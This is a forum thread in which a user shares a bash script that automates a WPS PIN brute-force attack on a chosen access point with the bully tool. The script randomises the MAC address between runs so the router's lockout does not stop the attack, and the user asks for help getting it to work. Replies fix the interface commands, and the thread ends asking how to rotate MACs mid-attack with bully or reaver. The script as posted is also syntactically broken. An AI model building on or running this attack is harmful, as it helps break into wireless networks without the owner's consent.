Forum Thread: "Bully" Bash Scripting Problem..


i am writing a script which changes the mac address everytime when bully attacks the AP(having WPS enabled) i have read the Master OTW Post

here is the script
echo enter the target AP
read target
echo enter the target channel
read channel
while $count -le 3 ## i will increase the value wen fully tested
iwconfig mon0 txpower off
macchanger -r mon0
iwconfig mon0 txpower on
bully -b $target -c $channel mon0
sleep 60 ## i will reduce the value a little


the only problem is in the bully part.. instead of directly putting the value in the BULLY command i am taking the value from the user..

but its throwing error as---------------
./ line 17: 8897 Segmentation fault bully -b $target -c $channel mon0
whats wrong????

3 Responses

there is bracket in while part. this page is not allowing it.

Pro-Tip: put your code on pastebin rather than dropping it straight into your post.

ok, i have solved the problem..

the error was not due to the bully syntax but because of the way i am switching mon0 on and off.. i have used the wrong command.. it should be like this..

ifconfig mon0 up
ifconfig mon0 down

thats all..

but still using bully and reaver inside a loop doesnt work.. i mean once bully starts there is no way to change mac again and start the bully..

thought this work while attempting a deauthorisation..

any1 having the idea how to change mac address using bully or reaper..

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